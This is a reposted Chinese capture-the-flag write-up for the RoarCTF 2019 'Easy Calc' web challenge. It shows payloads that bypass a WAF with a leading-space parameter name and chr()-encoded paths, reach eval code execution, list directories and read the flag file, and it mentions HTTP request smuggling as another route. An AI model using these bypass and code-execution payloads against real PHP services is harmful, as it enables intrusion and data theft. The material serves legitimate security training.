标签：web buuctf 解析 -- 空格 chr num 绕过 php

[RoarCTF 2019]Easy Calc

打开靶场：


查看源代码，发现有一个calc.php文件，并且提示设置了waf
先尝试访问calc.php

得到源码，使用get方式传参赋值给num，并且使用正则表达式进行了过滤，只要能绕过过滤，就可以通过eval进行任意php语句
首先尝试直接?num=phpinfo()

禁止访问，应该是waf起了作用，根据大佬们的wp知道可以通过在num前加一个空格进行绕过
原理：php解析规则：当php进行解析时，如果变量名前面有空格，php会自动去掉前面的空格再进行解析，假如waf不允许num变量接收字母，那么使用 num就可以，而php解析时就会自动把空格去掉

尝试? num=phpinfo()

成功绕过，先使用scandir查看目录中的内容，找到存有flag的文件

? num=scandir("/")

忘了/被过滤了，尝试绕过。使用chr对/的ascii码进行转换绕过，只有这个才不需要引号

? num=var_dump(scandir(chr(47)))

得到f1agg文件
尝试对该文件进行读取

? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

得到flag

还有一种解题方法，http走私，参考大佬的博客
[RoarCTF 2019]Easy Calc(http走私 && 利用PHP的字符串解析特性Bypass)

标签：web,buuctf,解析,--,空格,chr,num,绕过,php
来源： https://blog.csdn.net/pakho_C/article/details/122776619

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。